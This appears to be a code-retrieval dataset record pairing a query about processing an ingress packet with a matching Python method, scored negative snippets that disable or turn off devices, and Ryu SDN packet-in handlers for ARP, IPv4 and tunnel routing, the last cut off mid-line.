self._data[\"poe-out\"] == \"auto-on\":\n path = \"/interface/ethernet\"\n self._ctrl.set_value(path, param, value, \"poe-out\", \"off\")\n\n await self._ctrl.async_update()", "def disabled(config):\n disable(config)\n reload_service('apache2')", "def get_disabled_switch(self):\n return self.disabled", "async def disable_paging(self):\n\n # Display info message\n log.info(\"disable_paging\")\n\n # Send command to the device to disable paging\n await self.send_command(self.cmd_disable_paging)", "def turn_off(self):\n if self._module_type == NA_VALVE:\n self._data.homestatus.setroomThermpoint(\n self._data.home_id,\n self._room_id,\n STATE_NETATMO_MANUAL,\n DEFAULT_MIN_TEMP,\n )\n elif self.hvac_mode != HVAC_MODE_OFF:\n self._data.homestatus.setroomThermpoint(\n self._data.home_id, self._room_id, 
STATE_NETATMO_OFF\n )\n self.update_without_throttle = True\n self.schedule_update_ha_state()", "def allOff():\n # Get/set special slice IDs\n root_xid = bwlimit.get_xid(\"root\")\n default_xid = bwlimit.get_xid(\"default\")\n kernelhtbs = gethtbs(root_xid, default_xid)\n if len(kernelhtbs):\n logger.log(\"bwmon: Disabling all running HTBs.\")\n for htb in kernelhtbs.keys(): bwlimit.off(htb, dev = dev_default)", "def stop(self):\n # remove all tap interfaces\n for i in range(self._vport_id):\n tapx = 'tap' + str(i)\n tap_cmd_list = ['sudo', 'ip', 'tuntap', 'del', tapx, 'mode', 'tap']\n # let's assume, that all VMs have NIC QUEUES enabled or disabled\n # at the same time\n if int(settings.getValue('GUEST_NIC_QUEUES')[0]):\n tap_cmd_list += ['multi_queue']\n tasks.run_task(tap_cmd_list, self._logger, 'Deleting ' + tapx, False)\n self._vport_id = 0\n\n # remove datapath before vswitch shutdown\n dpctl = DPCtl()\n dpctl.del_dp()\n\n super(OvsVanilla, self).stop()\n\n # give vswitch time to terminate before modules are removed\n time.sleep(5)\n self._module_manager.remove_modules()", "async def disable(self, ctx):\n\n server = ctx.message.server\n\n settings = self.bot.dota_ticker_settings.get(server.id)\n\n if settings is not None:\n settings['enabled'] = False\n await self.bot.dota_ticker_settings.put(server.id, settings)\n\n await self.bot.say('The match ticker has been disabled on {0.name}.'.format(server))", "def deactivate():\n deactivate_connection_with_mainloop(get_uuid())", "def _doDisableRegulation(self):\n self._cmdRegulOff()", "def turn_off(self, **kwargs):\n request = requests.post(self._resource, data=\"0\", timeout=10)\n if (request.status_code == 200) or (request.status_code == 201):\n self._state = False\n else:\n _LOGGER.error(\"Can't turn off %s. 
Is resource/endpoint offline?\",\n self._resource)\n\n self.schedule_update_ha_state()", "def __disable__(self) -> None:\n pass", "async def unlight(self) -> None:\n self.lit = False\n await self.run_command(\"miner fault_light off\")\n print(\"unlight\" + self.ip)", "def Disable(self):\n handler = self.get_command_object(\"Disable\")\n handler()", "def disable(self):\n self.enabled = False\n self.__store(self)", "def disable(self) -> Awaitable[Dict]:\n return self.client.send(\"Security.disable\", {})", "async def disable_protection(self) -> None:\n await self._request(\n \"dns_config\", method=\"POST\", json_data={\"protection_enabled\": False},\n )", "async def disable(self, **kwargs) -> None: # pylint: disable=unused-argument\r\n await self.set_ena(False)", "def disable_emission(self):\n self.ask(\"LASER=OFF\")\n self.ask(\"LASER=ON\") # unlocks emission button, does NOT start emission!", "def turn_off(self, **kwargs):\n self.smartplug.turn_off()", "def tethering_disabled(self, tethering_disabled):\n\n self._tethering_disabled = tethering_disabled", "def turn_off(self, **kwargs: Any) -> None:\n self._device.power_on = False\n _LOGGER.debug(\"Turn off light %s\", self._device.ip)", "def disabletrafficitem(trafficItemName):\n middleware.trafficObj.disableTrafficItemByName(trafficItemName)", "def disable(self):\n self.registrar.unregister_service(\"map\", namespace=__name__)\n self.registrar.unregister_service(\"directions\", namespace=__name__)", "def disable(self):\n if not self.labExperiment:\n super().disable()\n else:\n self.zero()\n self.connection.query('close_dm')\n print(\"'BM1k' is now disbaled\")", "def turn_off(self, **kwargs):\n self._is_on = False", "def disable(self):\n raise NotImplementedError", "def turn_off(self, **kwargs):\n set_sonoff_state(self._host, \"off\")\n self._state = False", "def turn_off(self):\n self._interrupt_flash()\n if self.on:\n GPIO.output(self.pin, GPIO.LOW)\n self.on = False", "def disable(self, subsystem=False):\n self.__dict__[\"enabled\"] = False\n\n if subsystem:\n self.subsystem.disable()", "def stop_advertising(self):\n self._periph.stop_advertising()", "def _remove_from_switch(self, _switch, context):\n _network = context.current['id']\n _vlanid = context.current['provider:segmentation_id']\n\n # BRIDGE_PORT_URL = '{url_prefix}://{switch_name_or_ip}:{port}/networks/{vlan}/{network_id}/{port_id}'\n for _switchport in _switch.get('ports'):\n _request = requests.delete(\n BRIDGE_PORT_URL.format(url_prefix=self.url_prefix,\n port=self.protocol_port,\n switch_name_or_ip=_switch.get('name'),\n vlan=unicode(_vlanid),\n network_id=_network,\n port_id=_switchport)\n )\n LOG.info(\n _LI('Sending DELETE API Call to Switch %s'),\n _request.url\n )\n if _request.status_code != requests.codes.ok:\n LOG.error(\n _LE(\"Failed To Provision Switch %s\"), _request.text)\n raise MechanismDriverError()", "def enable(self):\n if not self.tm_started:\n for name, tm in self.air_traffic_manager.items():\n logging.debug(\"Starting tm %s\" % name)\n tm.start()\n tm_started = True\n\n logging.debug(\"Enabling switch %s\" % self.name)\n self.disabled = False", "def disable(name):\n if name in enabledStreams:\n stream = enabledStreams[name]\n del enabledStreams[name]\n print(\"Disabled {} ({})\".format(name, stream.get_NSVCA()))", "def turn_off(self):\n self._state = False\n self.write_state(bytes([1]))\n self.schedule_update_ha_state()", "def disable_everything(self):\n zhinst.utils.disable_everything(self.daq, self.device_id)\n self.log.info(\"Disabled 
everything.\")", "def disable(self):\n self.rx.threadKill()\n self.tx.threadKill()\n time.sleep(1)\n self.fisica.close()", "def disable_irq() -> int:", "def on_disable(self) -> None:\n self._cancel_automation()", "def disable(self):\n return self.enable(False)", "def disable(self):\n disable_request = self._commcell_object._services['DISABLE_SCHEDULE']\n\n request_text = \"taskId={0}\".format(self.schedule_policy_id)\n\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'POST', disable_request, request_text)\n\n if flag:\n if response.json():\n error_code = str(response.json()['errorCode'])\n\n if error_code == \"0\":\n return\n else:\n error_message = 'Failed to disable Schedule Policy'\n\n if 'errorMessage' in response.json():\n error_message = \"{0}\\nError: {1}\".format(error_message, response.json()['errorMessage'])\n\n raise SDKException('Schedules', '102', error_message)\n\n else:\n raise SDKException('Response', '102')\n\n response_string = self._commcell_object._update_response_(\n response.text)\n raise SDKException('Response', '101', response_string)", "def turn_off(self, **kwargs):\n _LOGGER.error(\"DALI TURN OFF\")\n self._state = False\n\n url = self.urlx + '/toggle'\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n state = json_data['state']\n\n self._dimmer = 0\n\n self._state = state == 'on'", "def Disable(self, request, global_params=None):\n config = self.GetMethodConfig('Disable')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Disable(self, request, global_params=None):\n config = self.GetMethodConfig('Disable')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Disable(self, request, global_params=None):\n config = self.GetMethodConfig('Disable')\n return self._RunMethod(\n config, request, global_params=global_params)", "def StopStatelessTrafficBlocking(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n payload = { \"Arg1\": self }\n for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]\n for item in kwargs.items(): payload[item[0]] = item[1]\n return self._execute('stopStatelessTrafficBlocking', payload=payload, response_object=None)", "def disable(self):\r\n self.update(enabled=False)", "def off(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n if self._pre_off_func:\n self._pre_off_func()\n switchboard = self._get_switchboard_if_initialized()\n if self._power_and_data_share_cable:\n if switchboard:\n switchboard.add_log_note(\n f\"comm_power.off() called on {self._device_name} set communication \"\n f\"port {self.port_number} to charge as device has a single USB \"\n \"cable for data and power.\")\n switchboard.close_all_transports()\n self._hub.switch_power.power_on(self.port_number, data_sync=False)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(\n self.secondary_port_number, data_sync=False)\n else:\n if switchboard:\n switchboard.close_all_transports()\n self._hub.switch_power.power_off(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_off(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_off()", "def shutdown(self):\n self.disable_modulation()\n self.disable()\n super().shutdown()", "def disable(self) -> None:\n if self.active_mode is not None:\n logger.info(\"Disabling 
'%s'\", self.active_mode.MODE_NAME)\n self.active_mode.on_disable()\n\n self.active_mode = None", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n port_info = {}\n port_info['FLEX_COUNTER_STATUS'] = DISABLE\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", PORT_BUFFER_DROP, port_info)", "def turn_off(self, **kwargs):\n self._is_on = False\n self.schedule_update_ha_state()\n self.hass.data[ZIGATE_DOMAIN].action_onoff(self._device.addr,\n self._endpoint,\n 0)", "def disable(self, sid):\n return", "def stop(self):\n self.running = False\n self.hop_channel(\"auto\")", "def turn_off(self):\n GPIO.output(self.gpio, False) # turn off light" ]
[ "0.66462976", "0.6192181", "0.6160286", "0.6113852", "0.6101358", "0.6030463", "0.6019299", "0.60160685", "0.6007818", "0.59888124", "0.5958932", "0.59445566", "0.5917474", "0.591579", "0.5867535", "0.5856679", "0.5840998", "0.583786", "0.58215153", "0.57709235", "0.5764594", "0.573368", "0.57228184", "0.57125336", "0.5711457", "0.5710529", "0.570228", "0.5700118", "0.56883967", "0.5661413", "0.56514955", "0.5648237", "0.5642898", "0.56314486", "0.56305003", "0.562342", "0.56224227", "0.5604275", "0.5595896", "0.5595237", "0.5567986", "0.55650157", "0.5552575", "0.5551788", "0.55504745", "0.5531258", "0.5529216", "0.55288035", "0.5527847", "0.55232376", "0.55224687", "0.5503649", "0.5482746", "0.54747134", "0.54744893", "0.54707754", "0.5449039", "0.54463845", "0.5442789", "0.54331887", "0.5424108", "0.5412981", "0.540464", "0.5390647", "0.5385855", "0.53795785", "0.53773934", "0.5370801", "0.5369836", "0.53559035", "0.5348963", "0.53279316", "0.5327846", "0.5327674", "0.53270185", "0.53208363", "0.5320338", "0.5318188", "0.5316621", "0.52965117", "0.5291853", "0.5287278", "0.52859503", "0.5282649", "0.5281748", "0.5280178", "0.52786607", "0.5275447", "0.5275447", "0.5275447", "0.5273711", "0.52697647", "0.5269579", "0.52682996", "0.5250305", "0.52331185", "0.52331", "0.5226781", "0.52264607", "0.5221016" ]
0.70145595
0
in_port    The ingress port number on which packet arrived
packet     A bytearray with the packet data
def process_packet(self, in_port, packet):
    buf = bytearray(packet)
    for idx in range((len(packet) + 19)/20):
        logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))
    if self.disabled:
        logging.debug("Switch is disabled; discarding packet")
        return
    parsed_packet = ParsedPacket(buf, self.metadata)
    logging.debug("Processing packet %d from port %d with %s" %
                  (parsed_packet.id, in_port, self.first_processor.name))
    self.first_processor.process(parsed_packet)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def port_in(self, port_in):\n\n self._port_in = port_in", "def port_in(self, port_in):\n\n self._port_in = port_in", "def _packet_in_debug(self, ev, in_port):\n #*** Extract parameters:\n msg = ev.msg\n datapath = msg.datapath\n dpid = datapath.id\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n eth_src = eth.src\n eth_dst = eth.dst\n pkt_ip4 = pkt.get_protocol(ipv4.ipv4)\n pkt_ip6 = pkt.get_protocol(ipv6.ipv6)\n pkt_tcp = pkt.get_protocol(tcp.tcp)\n\n #*** Some debug about the Packet In:\n if pkt_ip4 and pkt_tcp:\n self.logger.debug(\"event=pi_ipv4_tcp dpid=%s \"\n \"in_port=%s ip_src=%s ip_dst=%s tcp_src=%s \"\n \"tcp_dst=%s\",\n dpid, in_port, pkt_ip4.src, pkt_ip4.dst,\n pkt_tcp.src_port, pkt_tcp.dst_port)\n elif pkt_ip6 and pkt_tcp:\n self.logger.debug(\"event=pi_ipv6_tcp dpid=%s \"\n \"in_port=%s ip_src=%s ip_dst=%s tcp_src=%s \"\n \"tcp_dst=%s\",\n dpid, in_port, pkt_ip6.src, pkt_ip6.dst,\n pkt_tcp.src_port, pkt_tcp.dst_port)\n elif pkt_ip4:\n self.logger.debug(\"event=pi_ipv4 dpid=\"\n \"%s in_port=%s ip_src=%s ip_dst=%s proto=%s\",\n dpid, in_port,\n pkt_ip4.src, pkt_ip4.dst, pkt_ip4.proto)\n elif pkt_ip6:\n self.logger.debug(\"event=pi_ipv6 dpid=%s \"\n \"in_port=%s ip_src=%s ip_dst=%s\",\n dpid, in_port,\n pkt_ip6.src, pkt_ip6.dst)\n else:\n self.logger.debug(\"event=pi_other dpid=%s \"\n \"in_port=%s eth_src=%s eth_dst=%s eth_type=%s\",\n dpid, in_port, eth_src, eth_dst, eth.ethertype)", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n port = msg.match['in_port']\n gateway = self.gateway_get(datapath.id)\n\n if gateway is None:# or gateway.idc_id != CONF.idc_id:\n return\n\n pkt = packet.Packet(msg.data)\n pkt_ethernet = pkt.get_protocol(ethernet.ethernet)\n\n if not pkt_ethernet:\n LOG.info(_LI(\"drop non-ethernet packet\"))\n return\n\n pkt_arp = pkt.get_protocol(arp.arp)\n pkt_ipv4 = pkt.get_protocol(ipv4.ipv4)\n\n if pkt_arp:\n self.packet_arp.run(msg, pkt_ethernet, pkt_arp, gateway)\n elif pkt_ipv4:\n pkt_tp = pkt.get_protocol(tcp.tcp) or \\\n pkt.get_protocol(udp.udp) or \\\n pkt.get_protocol(icmp.icmp)\n\n if pkt.get_protocol(icmp.icmp):\n LOG.error(\"packet-in msg %s %s %s from %s\", datapath.id, pkt_ipv4, pkt_tp, port)\n LOG.debug(\"packet-in msg %s %s %s from %s\", \n datapath.id, pkt_ipv4, pkt_tp, port)\n\n if pkt_tp and port:\n self.packet_ipv4.run(msg, pkt_ethernet, pkt_ipv4, pkt_tp, gateway)\n else:\n LOG.debug(_LI(\"drop non-arp and non-ip packet\"))", "def _handle_PacketIn (self, event):\n packet_in = event.ofp # The actual ofp_packet_in message.\n \n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"%i %i ignoring unparsed packet\", dpid, inport)\n return\n \n if packet.type == ethernet.LLDP_TYPE:\n # Ignore LLDP packets\n return\n\n # self.act_like_hub(packet, packet_in)\n\n arpp = packet.find('arp')\n if arpp is not None:\n arp_type = \"unknown\"\n if arpp.opcode == arp.REQUEST:\n arp_type = \"request\"\n # return\n # NOTE: in a triangle topology, forwarding arp requests is not necessary\n # but it may be if topology changes\n elif arpp.opcode == arp.REPLY:\n arp_type = \"reply\"\n log.info(\"ARP %s for dst %s from source %s recieved by switch %d on port %d\", \n arp_type, arpp.protodst, arpp.protosrc, self.dpid, event.port)\n self.act_like_switch(packet, packet_in, event.port)\n # # Learn IP to MAC address mapping.\n # if self._mac_learn(packet.src, arpp.protosrc):\n # log.info(\"switch %s learned %s -> %s by ARP\", self.dpid, arpp.protosrc, packet.src)\n 
# # dpid = event.connection.dpid\n # inport = event.port \n # if packet.src not in self.mac_to_port:\n # self.mac_to_port[packet.src] = inport\n # # Respond to ARP request if appropriate.\n # if arpp.opcode == arp.REQUEST and ipinfo(arpp.protosrc)[0] == 1:\n # log.info(\"ARP request for dst %s from source %s recieved by switch %d on port %d\", arpp.protodst, arpp.protosrc, self.dpid, inport)\n # e = self._arp_response_pkt(arpp, packet)\n # msg = of.ofp_packet_out()\n # msg.data = e.pack()\n # msg.actions.append(of.ofp_action_output(port = of.OFPP_IN_PORT))\n # msg.in_port = inport\n # event.connection.send(msg)\n\n ipp = packet.find('ipv4')\n if ipp is not None:\n log.info(\"IP packet received by switch %d on port %d. src is %s, dst is %s\",\n self._id, event.port, ipp.srcip, ipp.dstip)\n self.act_like_switch(packet, packet_in, event.port)", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n inPort = msg.match['in_port']\n\n packet = Packet(msg.data)\n etherFrame = packet.get_protocol(ethernet)\n\n if etherFrame.ethertype == ether.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n\n if etherFrame.ethertype == ether.ETH_TYPE_ARP:\n self.receive_arp(datapath, packet, etherFrame, inPort)\n elif etherFrame.ethertype == ether.ETH_TYPE_IP:\n self.receive_ip(datapath, packet, etherFrame, inPort)\n else:\n LOG.debug(\"receive Unknown packet %s => %s (port%d)\"\n % (etherFrame.src, etherFrame.dst, inPort))\n self.print_etherFrame(etherFrame)\n LOG.debug(\"Drop packet\")\n return 1\n return 0", "def _handle_PacketIn (self, event):\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n self.do_final(packet, packet_in, event.port, event.dpid)", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at 
controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, 
currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. 
Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + 
